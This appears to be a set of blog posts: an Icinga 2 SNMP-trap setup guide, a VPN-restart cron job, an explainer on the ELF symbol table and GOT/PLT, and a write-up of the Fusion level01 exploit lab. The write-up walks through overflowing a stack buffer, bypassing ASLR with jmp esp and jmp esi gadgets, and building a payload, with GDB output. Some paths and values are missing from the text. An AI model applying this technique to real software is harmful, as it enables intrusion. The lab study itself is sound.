Receive SNMP Traps with Icinga 2 on Ubuntu/Debian

I'll warn you up front: making this happen is a pain if you're new to Icinga. I did my best to account for every nuance I ran into, but you may find something else. Feel free to comment if you need help.


Unfortunately, there is no official way for Icinga to receive SNMP traps. However, there is a pseudo-official hack everyone uses to make it happen. Icinga is not meant to be a replacement for full-scale SNMP management suites; however, it can do a pretty good job. I originally wrote this as a Word document and moved it over, so the indents on the numbering below may be slightly off, but it's all in the correct order.

Flow Synopsis

We’ll use a couple of programs in conjunction to make this happen. The device will generate SNMP traps and send them to the SNMP server, which in our example resides on the same box as Icinga. We will use snmptrapd as our SNMP trap server. We will configure the snmptrapd service with an SNMP trap handler. When snmptrapd receives an SNMP trap, it will forward the trap to the SNMP trap handler. In our case, we will use snmptt as the handler. This tool translates SNMP traps from an SNMP OID (more information here) to a meaningful set of text which represents the trap. snmptt will use an executable statement to determine what to do for that trap. Each trap will have a configurable executable statement (you can use wildcards).

In order to get Icinga to receive the alert, our executable statements in snmptt will call an Icinga event handler. This event handler will report the SNMP trap to a running Icinga service, which is what you’ll actually be able to see in Icinga itself.

Set up the SNMP Trap Daemon

Recall, the SNMP trap daemon is responsible for receiving SNMP traps from the target host.

  1. Start by installing the daemon itself with sudo apt-get install snmpd
  2. Edit the configuration for snmptrapd by running the following commands:
    1. vim /etc/snmp/snmptrapd.conf
    2. Add the following two lines. The traphandle line tells snmptrapd to feed any traps it receives to the /usr/sbin/snmptthandler program, which is part of the snmptt suite of tools we will install next. disableAuthorization yes tells snmptrapd not to screen incoming SNMP traps; you could configure snmptrapd to accept traps only from certain devices if you wanted to.
      1. traphandle default /usr/sbin/snmptthandler
      2. disableAuthorization yes
    3. The snmptrapd service script does not run properly. I haven’t taken the time to troubleshoot it, but you can run snmptrapd with snmptrapd -On -Lsd -p /var/run/ and the program will run properly.

Configure SNMPTT

SNMPTT will take the trap from snmptrapd (the trap handler) and convert it to a meaningful message which we can send to Icinga.

  1. The next few steps describe manual installation of SNMPTT. This is usually not necessary; if you are not installing manually, skip ahead to the apt-get installation step. Download SNMPTT; you can fetch it from the command line with wget. The file will download with a strange name, but it works if renamed to <anything>.tgz. Alternatively, download it from their home page here
  2. Run the following commands to install SNMPTT
    1. sudo cp snmptt snmptthandler /usr/sbin/
    2. sudo chmod +x /usr/sbin/snmptt /usr/sbin/snmptthandler
    3. sudo cp snmptt.ini /etc/snmp/
    4. sudo cp snmpttconvertmib /usr/sbin
    5. sudo groupadd snmptt
    6. sudo useradd -g snmptt snmptt
    7. sudo chown snmptt:snmptt /etc/snmp/snmptt.ini
    8. sudo mkdir /var/spool/snmptt
    9. sudo chown snmptt:snmptt /var/spool/snmptt/
    10. sudo vim /etc/snmp/snmptt.ini
      1. Change the line mode = standalone to mode = daemon
      2. If you want to change the DNS settings, change the line dns_enable = 0 to dns_enable = 1 and set strip_domain to 1
      3. Set syslog_enable to 0 if you do not have syslog set up
  1. Fix missing Perl dependencies by running the following commands. SNMPTT does not ship with these dependencies, so they must be installed.
    1. sudo cpan install List::Util
    2. sudo cpan install Config::IniFiles
  2. Install SNMPTT by running the command sudo apt-get install snmptt
  3. Install the MIBs you would like to monitor
    1. sudo mkdir ~/.snmp
    2. sudo mkdir ~/.snmp/mibs We created this folder because we are going to use the snmptranslate tool to take the .my files we download and translate them into usable statements for the SNMPTT tool. The snmptranslate tool checks two directories for MIB files: $HOME/.snmp/mibs and /usr/local/share/snmp/mibs.
    3. Download the .my files from the web. For my server, I used the Cisco MIB files. Change to the directory above and then run wget with the download URL
      1. If using the files from Cisco, simply extract the archive and then move all the .my files from the extracted folder to ~/.snmp/mibs
    4. Create a script to convert all of the MIB files to usable SNMPTT data
      1. vim
      2. Add the following lines to the script. Where it says <YOUR-SERVICE-NAME>, substitute the name of the service Icinga will run to receive the SNMP traps. In my case, I named the service snmp_traps; the name can be anything. This script runs the snmpttconvertmib command on every .my file in a target folder.

#!/bin/bash
for f in *.my
do
  echo "Processing $f"
  snmpttconvertmib --in=$f --out=/etc/snmp/snmptt.conf \
    --exec='/usr/lib/nagios/plugins/submit_check_result_2 $r <YOUR-SERVICE-NAME> 2'
done

  1. Save the following script as submit_check_result_2 in /usr/lib/nagios/plugins/. This script is what the --exec line in the above script points to. The above script will modify snmptt.conf, which will contain a series of execution statements. These execution statements run any time SNMPTT receives a trap that matches the clause for the corresponding execution statement. The below script actually submits the trap to Icinga

#!/bin/sh
# Written by Ethan Galstad
# Last Modified: 26 Oct 15
# This script will write a command to the Nagios command
# file to cause Nagios to process a passive service check
# result.  Note: This script is intended to be run on the
# same host that is running Nagios.  If you want to
# submit passive check results from a remote machine, look
# at using the nsca addon.

# Arguments:
#  $1 = host_name (Short name of host that the service is
#       associated with)
#  $2 = svc_description (Description of the service)
#  $3 = return_code (An integer that determines the state
#       of the service check, 0=OK, 1=WARNING, 2=CRITICAL,
#       3=UNKNOWN).
#  $4 = plugin_output (A text string that should be used
#       as the plugin output for the service check)

# get the current date/time in seconds since UNIX epoch
datetime=`date +%s`
# create the command line to add to the command file
cmdline="[$datetime] PROCESS_SERVICE_CHECK_RESULT;$1;$2;$3;$4"
# append the command to the end of the Icinga command file
echocmd="/bin/echo"
CommandFile="/var/run/icinga2/cmd/icinga2.cmd"
`$echocmd "$cmdline" >> $CommandFile`
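The command-file line the script builds has a fixed shape: a bracketed UNIX timestamp followed by the PROCESS_SERVICE_CHECK_RESULT command and its semicolon-separated arguments. As a rough sketch of that formatting (Python, with a hypothetical helper name and made-up host/service/output values):

```python
import time

def format_passive_check(host, service, return_code, output, now=None):
    """Hypothetical helper mirroring the shell script above: build one
    PROCESS_SERVICE_CHECK_RESULT line for the Icinga command file."""
    timestamp = int(now if now is not None else time.time())
    return "[%d] PROCESS_SERVICE_CHECK_RESULT;%s;%s;%d;%s" % (
        timestamp, host, service, return_code, output)

# Fixed timestamp only so the output is stable and readable.
print(format_passive_check("router1", "snmp_traps", 2, "Link down trap", now=1445817600))
```

Icinga reads lines of this shape from its command file and treats each one as a passive check result for the named host and service.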

  1. Run the command sudo chmod +x /usr/lib/nagios/plugins/submit_check_result_2
  2. Navigate to ~/.snmp/mibs and run the conversion script from the previous step within the folder. The script will then process all the .my files in the directory. Some may fail; depending on which MIBs you downloaded, that's fine, since not all entries will be processed. You can confirm the command ran successfully by checking the file /etc/snmp/snmptt.conf. The processed entries should appear there
  3. (Optional) Add a catchall definition by adding the following lines to your snmptt.conf file:

EVENT CatchAll .1.* "SNMP Traps" Critical
EXEC /usr/local/nagios/plugins/submit_check_result_2 "$r" "snmp_traps" 2 "$O: $1 $2 $3 $4 $5"

  1. Run SNMPTT with the command: sudo /usr/sbin/snmptt --daemon --debug=1 --debugfile=/var/log/snmptt.log Note: This is only necessary for manual installs or if you do not have it installed as a service. If you installed it via apt-get, skip to the next step.
  2. Run SNMPTT with sudo service snmptt start

Configure Icinga 2 to Receive the Alerts

Icinga receives the alert from SNMPTT via the command file at /var/run/icinga2/cmd/icinga2.cmd. We will use a passive service to check this file for new SNMP traps and then Icinga will report them.

  1. Edit the Icinga2 template file at /etc/icinga2/conf.d/templates.conf with vim /etc/icinga2/conf.d/templates.conf
  2. Add the following template to the file:

template Service "snmp-trap-service" {
  import "generic-service"
  check_command         = "passive"
  enable_notifications  = 1
  enable_active_checks  = 1
  enable_passive_checks = 1
  enable_flapping       = 0
  volatile              = 1
  max_check_attempts    = 1
  check_interval        = 87000
  enable_perfdata       = 0
  vars.sla              = "24x7"
  vars.dummy_state      = 2
  vars.dummy_text       = "No passive check result received."
}

apply Service "snmp_traps" {
  import "snmp-trap-service"
  assign where host.address
}

  1. In the snmp_traps service apply statement, the configuration applies the snmp-trap-service template to every host that has an address defined. Icinga provides more details here.
  2. This configuration only works if the host name configured for the Host object is the same as the host name in the incoming SNMP trap. If the two do not match, Icinga will discard the trap. In my configuration, my Cisco 1721 sent a particular host name, so the name in my object Host definition had to match it exactly.

Icinga "did not exit properly" error

I got this and it took some time to troubleshoot. The error is misleading. What it's really telling you is that the plugin failed to execute properly. Here's the catch: this includes warnings. So if you manually test the plugin from the command line outside of Icinga and it works but gives a warning, when you run it with Icinga it will fail and throw the aforementioned error. To fix the problem, you have to fix whatever in the code is giving the warning.

Netint plugin throws "did not exit properly" error

This was the specific problem I was having trouble with. I ran it on the command line and got some errors about an uninitialized variable. On line 2023 you'll see a line with the variable $oid_perf_inoct. That is the offending variable. You need to add an additional if statement outside this one. Enclose the whole thing in an if block:

if (defined $oid_perf_inoct[$i]) {
    # all that other stuff from the if block on line 2023
}

It worked for me after that.

Configuring Icinga for Cisco SNMP

Original Error: “CRITICAL – Plugin timed out while executing system call”

I had a bit of trouble getting this to work so I thought I would share my solution. I initially followed the tutorial here. I basically wanted Icinga to receive SNMP data from a Cisco 7200 I had set up.

To begin, set up your Cisco router according to this tutorial.

You can then begin setting up your monitoring services according to the tutorial I listed above.

Here’s where it differs. I found that the line:

check_command check_snmp!-C public -o sysUpTime.0

did not work. I discovered you can test the plugins manually by changing to your plugin directory and doing something like the following:

/usr/lib/nagios/plugins/check_snmp <COMMAND ARGUMENTS HERE>

In this way, if you want to try something new, you can run it manually first to see if it works.

I could not get a named identifier to work with the command so I ended up using the following in my config for Icinga:

check_command     check_snmp!-H <IP_ADDRESS_of_TARGET_HOST> -P 2c -C <COMMUNITY_STRING_HERE> -o .

The numbers at the end are the OID tree value corresponding to sysUpTime. You can view the tree here. You may notice there is an additional 0 at the end. This is the index number.
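For reference, sysUpTime's place in the standard MIB-2 tree is well documented: the object lives at 1.3.6.1.2.1.1.3, and the trailing index selects the instance. A tiny sketch of splitting a full OID into its object part and index (the OID below is the standard sysUpTime.0, stated from the MIB, not recovered from the command above):

```python
# sysUpTime is defined at 1.3.6.1.2.1.1.3 in MIB-2; scalar objects
# take instance index 0, so sysUpTime.0 is .1.3.6.1.2.1.1.3.0.
oid = ".1.3.6.1.2.1.1.3.0"
parts = oid.lstrip(".").split(".")
base, index = ".".join(parts[:-1]), parts[-1]
print(base)   # the object's position in the OID tree
print(index)  # the instance index the text mentions
```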


Stop Ubuntu 14.04 VPN From Dying

The title of my post is a bit misleading, but it's my solution to the problem. I found that my VPN would randomly die on Ubuntu. I could ping the internal network, but everything external was dead. What I did was add a cron job which checks every minute whether the interface is up and, if it isn't, restarts the VPN.

Type: sudo crontab -e

Add the line:

* * * * * if !(grep -q <VPN_INTERFACE_NAME> /proc/net/dev); then nmcli con up id <VPN_NAME>; fi

You can check a list of your interface names with nmcli con. The line basically says: check whether my VPN is in the list of active interfaces, and if it isn't, bring it up.
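The grep in the cron line keys off the fact that /proc/net/dev prints one "<iface>:" row per active interface. A minimal sketch of that check, with an invented /proc/net/dev snapshot and made-up interface names:

```python
# Invented snapshot of /proc/net/dev: one "<iface>:" row per interface.
proc_net_dev = """\
Inter-|   Receive                  |  Transmit
 face |bytes    packets            |bytes    packets
    lo:  123456     789                123456     789
  eth0: 9876543    4321               1234567     890
"""

def interface_up(name, table):
    # Roughly what grep -q does in the cron job: is the interface's
    # row present in the table at all?
    return any(line.strip().startswith(name + ":") for line in table.splitlines())

print(interface_up("eth0", proc_net_dev))  # interface present
print(interface_up("tun0", proc_net_dev))  # absent: the cron job would restart the VPN
```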

Hope this helps.

What is the Symbol Table and What is the Global Offset Table?


When I first sought to understand the symbol table and the global offset table (GOT), I found bits and pieces of information, but I had trouble getting the whole picture. Once I understood what they are, I realized it is easier to describe the symbol table and GOT in the context of the linking and loading process in which they are used. That's what this post does. It explains the why of the symbol table and GOT to help you understand them in context.

Most of the credit goes to the authors of the posts of which this one is an amalgamation. This is more a collection of pieces of information to hopefully paint a clearer picture of the whole.

The Linking Process

If you aren’t already familiar with the C++ compilation process see this and this (they’re short :-D). You’ll need to understand that to understand this.

Relocation Records

Object files contain references to each other’s code and data. Due to this, the linker must combine them at link time. After linking all of the object files together, the linker uses the relocation records to find all of the addresses that need to be filled in.

The Symbol Table

Since assembling to machine code removes all traces of labels from the code, the object file format has to keep these around in a different place.  It does this in the form of the symbol table, a list of names and their corresponding offsets in the text and data segments. (Source)

To recap an important concept, an executable file is made up of several object files. You might have two object files and a c library that are all combined by the linker at link time into one executable file.

Shared Objects

Most systems run a number of programs at any given time. If you're familiar with programming, it probably comes as no surprise that these programs each use many of the same libraries. For example, many programs use the standard C library, which exports functions like printf and malloc. Naturally, we must then have a copy of the C library within the running memory of each of these programs; after all, I said earlier that we combine object files and libraries to create executable files. However, this is a mammoth waste of resources, so each program holds a reference to a single shared copy of the library instead.

Static Linking vs Dynamic Linking

In a statically linked scenario a program and the particular library it is using are combined by the linker at link time. By contrast, a dynamically linked library (in Windows a .dll file and in Linux a .so file) is linked when the executable runs.

The linker binds statically linked libraries with the program at link time (which comes directly after compilation/assembly). The largest advantage of static linking is that you can be certain what version of the library is present. This means that DLL Hell/Dependency Hell isn't a problem for statically linked executables. This also means the executable exists as a single file rather than several files. Additionally, a statically linked executable only contains those parts of the library it needs to execute, whereas a dynamically linked program must load the entire library at runtime because it is not known in advance which functions the application will invoke.

On the downside, statically linked executables are much larger because they carry with them all of their library code. Additionally, in order to update the executable you must recompile/link it.

The term 'dynamically linked' means that the program and the particular library it references are not combined together by the linker at link time. Instead, the linker places information into the executable that tells the loader which shared object module the code is in and which runtime linker should be used to find and bind the references. (Source) This means the linker finds the shared object and binds it to the executable at runtime. This type of program is also called a partially bound executable because it isn't fully bound at link time: the linker did not resolve all the referenced symbols, but instead placed references to the shared objects in the executable. There are four main advantages to using dynamically linked executables.

  1. The executable is smaller
  2. Libraries may be upgraded or patched without having to relink all of the executables which depend on them. In the same vein, you don’t have to distribute the source code of the libraries – you only need the compiled binary version.
  3. Programmers must only deliver the unique libraries with their code. The programmer may assume that standard libraries will already be on the system.
  4. When combined with virtual memory, dynamic linking permits two or more processes to share read-only executable code such as the standard C library or the kernel. This means the system must keep only one copy of that code in memory rather than one for each process.

The Executable and Linkable Format (ELF) File Format

I’ll start by saying if you’re on Windows you’ll be using the PE/COFF file format. Most of the principles explained here conceptually port over to the PE/COFF format.

In order to fully understand shared objects, the symbol table and the GoT, you have to understand the ELF file format. The ELF specification defines the layout of an object file and its subsequent executable. It is the way we standardize the executables across systems, typically in the case of the ELF format, Linux systems. The ELF file format is fairly complicated and you can read about it in extreme detail here. In this post, I will settle for the parts relevant to the symbol table and the GoT.

Section vs Segment

Within the ELF format there are two ways to view the object file/executable, either the linking view or the execution view. Below is a diagram of the comparison



ELF uses the link view at static linking time for relocatable file combination and the execution view at run time to load and execute programs. The linking view by and large deals with sections whereas the execution view deals with segments. Sections provide the information needed at link time and segments the information needed at runtime.

Sections have a name and type, a requested memory location at run time, and permissions. You can locate the sections by examining the section header table. Each section has:

  • One section header describing it; section headers may also exist without a section.
  • One contiguous (possibly empty) sequence of bytes within the file.
  • No overlap with any other section.
  • Possibly inactive space; the various headers and the sections might not cover every byte in an object file.
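The "no overlap" property is easy to state as code. A small sketch, treating each section as a (name, offset, size) triple; the section names and numbers below are invented:

```python
def sections_overlap(sections):
    """sections: iterable of (name, offset, size) triples.
    True if any two sections share a byte in the file."""
    spans = sorted((off, off + size) for _, off, size in sections)
    return any(end_a > start_b for (_, end_a), (start_b, _) in zip(spans, spans[1:]))

# Invented layout: three sections back to back; .bss occupies no file bytes,
# which is the "possibly empty" case from the list above.
layout = [(".text", 0x100, 0x200), (".data", 0x300, 0x80), (".bss", 0x380, 0x0)]
print(sections_overlap(layout))
```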

Segments group related sections. For example, the text segment groups executable code, the data segment groups the program data, and the dynamic segment groups information relevant to dynamic loading. Each segment consists of one or more sections. In this post, we are primarily interested in the PT_DYNAMIC type segment.

Process Image and the Dynamic Linker

The process image is created by loading and interpreting the segments. When building an executable file that uses dynamic linking, the link editor adds a program header element of type PT_INTERP to an executable file, telling the system to invoke the dynamic linker as the program interpreter. The dynamic linker creates the process image for a program.  At link time, the program or library is built by merging together sections with similar attributes into segments. Typically, all the executable and read-only data sections are combined into a single text segment, while the data and BSS are combined into the data segment. These segments are normally called load segments, because they need to be loaded in memory at process creation. Other sections such as symbol information and debugging sections are merged into other, non-load segments. (Source)

Creating the process image entails the following activities (source):

  • Adding the executable file’s memory segments to the process image
  • Adding shared object memory segments to the process image
  • Performing relocations for the executable file and its shared objects
  • Closing the file descriptor that was used to read the executable file, if one was given to the dynamic linker
  • Transferring control to the program, making it look as if the program had received control directly from exec(BA_OS)

There are three sections we care about specifically in this post:

  • .dynamic: The structure residing at the beginning of the section holds the addresses of other dynamic linking information.
  • .got and .plt (procedure linkage table): .got stores the addresses of system functions and the .plt stores indirect links into the GoT

Shared objects may occupy virtual memory addresses that are different from the addresses recorded in the file’s program header table. The dynamic linker relocates the memory image, updating absolute addresses before the application gains control. Although the absolute address values would be correct if the library were loaded at the addresses specified in the program header table, this normally is not the case.

The Global Offset Table (GOT)

The GOT is a table of addresses which resides in the data section. If some instruction in code wants to refer to a variable it must normally use an absolute memory address. Instead of referring to the absolute memory address, it refers to the GOT, whose location is known. The relative location of the GOT from the instruction in question is constant.

Now you might be thinking, “Great, but I still have to resolve all those addresses within the GOT so what’s the point?” There are two things using the GOT gets us.

  1. Without it, we would have to relocate every reference in the code section. If everything references the GOT instead, we only have to update the GOT once. This is much more efficient.
  2. The data section is both writable and not shared between processes. Performing relocations in this section causes no harm, whereas relocations in the code section disallow sharing, which defeats the purpose of a shared library.

Here is an example I pulled from Eli Bendersky’s explanation:

In pseudo-assembly, we replace an absolute addressing instruction:

; Place the value of the variable in edx
mov edx, [ADDR_OF_VAR]

With displacement addressing from a register, along with an extra indirection:

; 1. Somehow get the address of the GOT into ebx
lea ebx, ADDR_OF_GOT

; 2. Suppose ADDR_OF_VAR is stored at offset 0x10
;    in the GOT. Then this will place ADDR_OF_VAR
;    into edx.
mov edx, DWORD PTR [ebx + 0x10]

; 3. Finally, access the variable and place its
;    value into edx.
mov edx, DWORD PTR [edx]

If you would like to see the rest of the process in a high level of detail, I strongly suggest taking a look at Eli Bendersky's article under the section titled "PIC with data references through GOT – an example"

This is straightforward enough for global variables, but what about function calls? Theoretically, things could work the same way, but they’re actually a bit more complicated.

The Procedure Linkage Table (PLT)

The PLT is part of the executable text section, containing an entry for each external function the shared library calls. Each PLT entry is a short chunk of executable code. Instead of calling the function directly, the code calls an entry in the PLT, which then calls the actual function. Each entry in the PLT also has a corresponding entry in the GOT which contains the actual offset to the function, but only after the dynamic loader has resolved it.

The PLT uses what is called lazy resolution. It won’t actually resolve the address of a function until it absolutely has to. This makes it so effort is only put into resolving those functions actually used. The process works in the following manner:

  1. A function func is called and the compiler translates this to a call to func@plt.
  2. The program jumps to the PLT. The PLT points to the GOT. If the function hasn’t been previously called, the GOT points back into the PLT to a resolver routine, otherwise it points to the function itself.
  3. If the function hasn’t been previously called, the program jumps back from the GOT to the PLT, which then runs a resolver routine to update the GOT entry with actual address of the function.

The reason we use this lazy initialization is that it saves us the trouble of resolving all the functions that aren’t actually used during runtime.
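The lazy-binding sequence above can be modeled in a few lines: every GOT slot starts out pointing at a resolver stub, and the first call patches the slot to the real function. This is a sketch of the mechanism only; the names (LIBRARY, make_plt_entry) are invented, and the real work happens in machine code inside the dynamic linker:

```python
GOT = {}        # slot name -> callable; starts out pointing at the resolver
RESOLVED = []   # which symbols the resolver actually had to fix up

def real_printf(msg):
    return "printf:" + msg

LIBRARY = {"printf": real_printf}   # stands in for the shared library's exports

def make_plt_entry(name):
    def resolver(*args):
        # First call only: look the symbol up, patch the GOT slot so
        # later calls skip resolution, then call the real function.
        RESOLVED.append(name)
        GOT[name] = LIBRARY[name]
        return GOT[name](*args)
    GOT[name] = resolver
    # The PLT entry itself always jumps through the GOT slot.
    return lambda *args: GOT[name](*args)

printf = make_plt_entry("printf")
printf("a")        # first call goes through the resolver
printf("b")        # second call goes straight to real_printf
print(RESOLVED)    # the resolver ran exactly once
```

Note that a function never called would leave its GOT slot pointing at the resolver forever, which is exactly the saving lazy binding buys.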

Again, if you would like to see a specific example, I strongly recommend Eli Bendersky’s article. Look under the section “PIC with function calls through PLT and GOT – an example”

Other Sources


Fusion Exploit Challenges Level 01

Some GDB Housekeeping

When I first started this challenge, I was quite thrown off. I started debugging with GDB and my level00 exploit worked perfectly as is. In fact, after closer inspection I realized that none of the addresses from level00 were different in level01. I figured this wasn’t a coincidence. After running my exploit against the code outside of GDB and it not working I guessed what was going on – GDB disables ASLR to make debugging easier. My first step was to turn it back on so I could see what was going on.

set disable-randomization off

If you have a previously running level01 which you opened with gdb at any point before using the disable-randomization command, you'll need to kill that instance of level01 and open a new one. Once GDB opens a process, it seems to rebase it.

Once I did that and reexamined the crash from level00 I saw that my return address took me to non-existent memory:

(gdb) c
[New process 15084]
[Switching to process 15084]

Breakpoint 1, 0x08049854 in fix_path (path=Cannot access memory at address 0x41414149
) at level01/level01.c:9
9 in level01/level01.c
(gdb) stepi
0xbffff3ec in ?? ()
(gdb) x/40x $eip
0xbffff3ec: Cannot access memory at address 0xbffff3ec

Poking Around

Our stack has indeed changed. Now we must find a way to make it to our shellcode. An examination of the stack pointer reveals the new location of our shellcode.

(gdb) x/300x $esp
0xbff0a7d0: 0xbff0a700 0x00000020 0x00000004 0x001761e4
0xbff0a7e0: 0x001761e4 0x000027d8 0x20544547 0x41414141
0xbff0a7f0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbff0a800: 0x41414141 0x41414141 0x41414141 0x41414141
0xbff0a810: 0x41414141 0x41414141 0x41414141 0x41414141
0xbff0a820: 0x41414141 0x41414141 0x41414141 0x41414141
0xbff0a830: 0x41414141 0x41414141 0x41414141 0x41414141
0xbff0a840: 0x41414141 0x41414141 0x41414141 0x41414141
0xbff0a850: 0x41414141 0x41414141 0x41414141 0x41414141
0xbff0a860: 0x41414141 0x41414141 0x41414141 0x41414141
0xbff0a870: 0x41414141 0xec414141 0x00bffff3 0x50545448
0xbff0a880: 0x312e312f 0x43430a0d 0x43434343 0x43434343
0xbff0a890: 0x43434343 0x43434343 0x43434343 0x43434343
0xbff0a8a0: 0x43434343 0x43434343 0x43434343 0x43434343
0xbff0a8b0: 0x43434343 0x43434343 0x43434343 0x43434343
0xbff0a8c0: 0x43434343 0x43434343 0x43434343 0x43434343
0xbff0a8d0: 0x43434343 0x43434343 0x43434343 0x43434343
0xbff0a8e0: 0x43434343 0x43434343 0x43434343 0x43434343

In my case the 0x43s represent where the shellcode would sit. My next step was to examine the registers. The reason is that the challenge only enabled ASLR on the stack, heap, and mmap regions, which means everything else should still be static. If I can find a register that contains my shellcode, I could potentially find a gadget which jumps to that register to reach my shellcode.

(gdb) info registers
eax 0x1 1
ecx 0xb76b78d0 -1217693488
edx 0xbff0a7d0 -1074747440
ebx 0xb782fff4 -1216151564
esp 0xbff0a7d0 0xbff0a7d0
ebp 0x41414141 0x41414141
esi 0xbff0a884 -1074747260
edi 0x8049ed1 134520529
eip 0xbffff3ec 0xbffff3ec
eflags 0x246 [ PF ZF IF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51

Ah ha! There are several promising candidates from our lineup of registers. It looks like edx, esp, or esi could work. Additionally, we control the value of ebp so we could make use of it as well potentially. There are much fancier ways to do this, but I just used objdump to look for gadgets:

root@fusion:/opt/fusion/bin# objdump -D level01 | grep jmp

8049464: e9 3a ff ff ff jmp 80493a3 <serve_forever+0x14>
80495ff: eb 05 jmp 8049606 <is_restarted_process+0x53>
804962d: eb 44 jmp 8049673 <nread+0x66>
80496a0: eb 44 jmp 80496e6 <nwrite+0x66>
80497c9: eb 09 jmp 80497d4 <secure_srand+0xe1>
804983c: eb 15 jmp 8049853 <fix_path+0x3e>
8049a31: eb 0d jmp 8049a40 <__libc_csu_fini>
8049f0d: e9 ff ff d4 00 jmp 8d99f11 <_end+0xd4ea65>
8049f5f: ff 28 ljmp *(%eax)
8049f7f: ff ac 02 00 00 e2 f8 ljmp *-0x71e0000(%edx,%eax,1)
804a063: ff ab 00 00 00 00 ljmp *0x0(%ebx)
804a0cf: ff 6c 01 00 ljmp *0x0(%ecx,%eax,1)
804a1b7: ff ef ljmp *<internal disassembler error>
804a217: ff 25 01 00 00 00 jmp *0x1
804a25f: ff 61 00 jmp *0x0(%ecx)
804b302: ff 6f 8c ljmp *-0x74(%edi)
804b36a: ff 6f d4 ljmp *-0x2c(%edi)
804b372: ff 6f 01 ljmp *0x1(%edi)
804b37a: ff 6f 70 ljmp *0x70(%edi)
1b8f: ff 21 jmp *(%ecx)
230f: ff a5 8f 00 00 80 jmp *-0x7fffff71(%ebp)
254f: ff ee ljmp *<internal disassembler error>
27e3: ff ab 90 00 00 80 ljmp *-0x7fffff70(%ebx)

Glancing through this, none of those jmps are exactly what I’m looking for so I decided to kick up the fancy levels a bit. What about the shared libraries? Those should be loaded in static locations as well.

(gdb) info sharedlibrary
From To Syms Read Shared Object Library
0xb76cebe0 0xb77db784 Yes /lib/i386-linux-gnu/
0xb7841830 0xb78585cf Yes (*) /lib/
(*): Shared library is missing debugging information.

Check that out. Libc is loaded into memory. I would find it very difficult to believe that libc doesn’t have what we’re looking for. After further examining the registers ESI is easily the most promising, but there is a small problem.

x/80x $esi
0xbff0a884: 0x43430a0d 0x43434343 0x43434343 0x43434343
0xbff0a894: 0x43434343 0x43434343 0x43434343 0x43434343
0xbff0a8a4: 0x43434343 0x43434343 0x43434343 0x43434343
0xbff0a8b4: 0x43434343 0x43434343 0x43434343 0x43434343
0xbff0a8c4: 0x43434343 0x43434343 0x43434343 0x43434343

There are some garbage bits written at the beginning of the address space. So if we jump directly to ESI we’re going to immediately crash. So what we need is a jump to ESI at a short offset in. Again, given the size of libc, I’m guessing that won’t be hard to do.

objdump -D /lib/i386-linux-gnu/ | grep jmp | grep esi
1536cf:       ff 6e 06                ljmp   *0x6(%esi)

Indeed it was not. This should do exactly what we want. Now we need to figure out where libc was loaded:

(gdb) info proc mapping libc
process 15084
cmdline = ‘./level01’
cwd = ‘/’
exe = ‘/opt/fusion/bin/level01’
Mapped address spaces:

Start Addr End Addr Size Offset objfile
0x8048000 0x804b000 0x3000 0 /opt/fusion/bin/level01
0x804b000 0x804c000 0x1000 0x2000 /opt/fusion/bin/level01
0xb76b7000 0xb76b8000 0x1000 0
0xb76b8000 0xb782e000 0x176000 0 /lib/i386-linux-gnu/
0xb782e000 0xb7830000 0x2000 0x176000 /lib/i386-linux-gnu/
0xb7830000 0xb7831000 0x1000 0x178000 /lib/i386-linux-gnu/
0xb7831000 0xb7834000 0x3000 0
0xb783e000 0xb7840000 0x2000 0
0xb7840000 0xb7841000 0x1000 0 [vdso]
0xb7841000 0xb785f000 0x1e000 0 /lib/i386-linux-gnu/
0xb785f000 0xb7860000 0x1000 0x1d000 /lib/i386-linux-gnu/
0xb7860000 0xb7861000 0x1000 0x1e000 /lib/i386-linux-gnu/
0xbfeeb000 0xbff0c000 0x21000 0 [stack]

That’s a little difficult to read, but libc was loaded at 0xb76b8000. Now I confirm our jump is indeed where I think it is:

(gdb) x/i 0xb76b8000+0x1536cf
0xb780b6cf: jmp FWORD PTR [esi+0x6]
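The address check is just base-plus-offset arithmetic, using the load address from info proc mapping and the file offset from objdump:

```python
libc_base = 0xb76b8000      # where libc was mapped, per gdb
gadget_offset = 0x1536cf    # file offset of the gadget, per objdump
# The gadget's runtime address is simply the mapping base plus the offset.
print(hex(libc_base + gadget_offset))
```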

At first I thought this would work. Unfortunately, that jumps to the address stored at the pointer esi+0x6, which in our case is 43434343 for testing purposes. We just want to jump to ESI itself. I could find no ljmp with an offset matching that criteria, and the straight jmp esi gadgets come with no offset. We can still work with that: after looking at the instruction formed by the garbage bits at the start of the buffer (which seemed to be constant), it comes out as valid and executable.

root@fusion:/opt/fusion/bin# objdump -D /lib/i386-linux-gnu/ | grep jmp | grep esi | grep e6 | grep -v "("
77b63: ff e6 jmp *%esi

(gdb) x/i 0xb76b8000+0x77b63
0xb772fb63 <_wordcopy_fwd_aligned+51>: jmp esi
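As an aside, this kind of raw opcode hunt is easy to script. Here is a minimal sketch (a hypothetical helper, not one of the tools used above) that finds every offset of the two-byte encoding of jmp *%esi:

```python
# Scan a chunk of binary data for the raw opcode of jmp *%esi (ff e6)
# and return every file offset where it appears, overlaps included.
def find_jmp_esi(data):
    offsets = []
    start = 0
    while True:
        i = data.find(b"\xff\xe6", start)
        if i == -1:
            return offsets
        offsets.append(i)
        start = i + 1
```

Running it over the bytes of a binary surfaces the same candidates the objdump/grep pipeline reports, without depending on the disassembler's formatting.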

I went ahead and tested this and unfortunately found it still segfaulted. After killing the process and reexamining the location of libc, I found it had moved! The locations of all the libraries are randomized on each run. At this juncture I realized my original tactic wouldn't work; the only module whose location doesn't change is level01 itself. I found a better way of doing things and used msfelfscan to check for usable jumps in the level01 module:

root@fusion:/opt/fusion/bin# /opt/metasploit-framework/msfelfscan -j esi,esp,eax,edx,edi,ecx level01
0x08048c1f call eax
0x08049a6b call eax
0x08049f4f jmp esp

Not many options unfortunately. On a whim though I checked out ESP:

(gdb) x/8x $esp
0xbfc653fc: 0x08049f4f 0xbfc65400 0x00000020 0x00000004
0xbfc6540c: 0x00000000 0x001761e4 0xbfc654a0 0x20544547

It looks like I control the bytes just past the return address, which is exactly where ESP points after the ret. For giggles, I threw in \xFF\xE6 right after my return address; FF E6 is the machine code for jmp *%esi. To my surprise, it worked! The jmp esp gadget executed those two bytes, which in turn jumped through ESI into the buffer I controlled!
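The layout this relies on can be sketched explicitly. This is a hedged reconstruction of the control-flow portion of the request; the jmp esp address is the one msfelfscan reported above:

```python
import struct

# level01 is not position-independent, so this gadget address is fixed.
JMP_ESP = 0x08049f4f

payload  = b"A" * 139                   # filler up to the saved return address
payload += struct.pack("<I", JMP_ESP)   # ret lands on jmp esp
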